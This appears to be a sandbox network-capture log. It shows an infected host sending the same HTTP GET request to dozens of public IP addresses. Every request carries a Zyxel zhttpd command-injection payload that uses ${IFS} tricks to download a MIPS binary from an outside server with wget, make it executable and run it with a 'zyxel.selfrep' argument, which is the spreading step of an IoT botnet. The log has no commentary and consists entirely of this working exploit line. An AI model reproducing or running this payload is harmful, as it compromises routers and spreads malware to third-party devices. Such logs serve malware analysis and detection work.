                                                        Feb 2, 2024 06:21:25.251250982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8247192.168.2.145422096.143.62.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251298904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8248192.168.2.143776213.120.190.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251327038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8249192.168.2.1460446179.207.88.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251368046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8250192.168.2.145547060.187.187.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251393080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8251192.168.2.1444532167.115.130.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251421928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8252192.168.2.1441894122.156.205.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251447916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8253192.168.2.1446722119.0.88.201443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251493931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8254192.168.2.145307224.250.181.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251526117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8255192.168.2.1445422143.217.129.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251564026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8256192.168.2.1442248121.90.101.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251600027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8257192.168.2.144068879.227.207.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251662016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8258192.168.2.1448716203.172.113.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251707077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8259192.168.2.1444142200.99.241.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251754045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8260192.168.2.144080854.87.152.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251781940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8261192.168.2.1452638143.105.121.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251823902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8262192.168.2.144823663.127.72.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251853943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8263192.168.2.1442516208.20.72.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251908064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8264192.168.2.144307439.100.209.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251945972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8265192.168.2.1436452144.26.208.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251962900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8266192.168.2.1458640137.44.248.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.251996994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8267192.168.2.1457622117.47.26.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252021074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8268192.168.2.1446074218.83.20.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252088070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8269192.168.2.1443292202.78.161.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252106905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8270192.168.2.145778253.95.115.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252156973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8271192.168.2.144060673.4.216.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252209902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8272192.168.2.1450712155.18.89.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252223969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8273192.168.2.1437772200.82.67.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252296925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8274192.168.2.1446398137.235.212.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252332926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8275192.168.2.145328493.5.77.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252376080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8276192.168.2.1457806189.1.146.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252420902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8277192.168.2.143973891.60.95.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252476931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8278192.168.2.1455550159.9.211.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252515078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8279192.168.2.1460010104.169.127.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252549887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8280192.168.2.143321287.204.118.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252569914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8281192.168.2.1454230188.95.116.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252618074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8282192.168.2.1446600104.139.137.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252651930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8283192.168.2.145311692.254.39.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252703905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8284192.168.2.145804274.216.91.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252747059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8285192.168.2.145196434.245.118.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252784967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8286192.168.2.1437604151.238.161.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252846003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8287192.168.2.1438598119.174.14.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252878904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8288192.168.2.144356477.155.184.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252918959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8289192.168.2.144595081.28.55.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252954006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8290192.168.2.1445932164.200.217.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.252986908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8291192.168.2.1460796138.183.250.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253050089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8292192.168.2.145092036.253.101.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253076077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8293192.168.2.1437570180.33.52.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253120899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8294192.168.2.1440136139.153.59.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253154993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8295192.168.2.1453692196.192.24.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253189087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8296192.168.2.1439934139.238.174.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253242016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8297192.168.2.1454962114.231.207.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253272057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8298192.168.2.1441138139.66.145.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253314018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8299192.168.2.145757817.16.25.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253367901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8300192.168.2.1443638119.183.188.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253388882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8301192.168.2.144961288.228.202.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253444910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8302192.168.2.1448888169.217.208.166443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253470898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8303192.168.2.1432890106.154.119.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253511906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8304192.168.2.1435942131.103.153.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253568888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8305192.168.2.1439022125.193.166.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253618002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8306192.168.2.1452222154.36.41.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253638029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8307192.168.2.14530385.117.179.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253676891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8308192.168.2.1446782206.192.145.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:25.253703117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8309192.168.2.144921635.17.80.155443
                                                        TimestampBytes transferredDirectionData
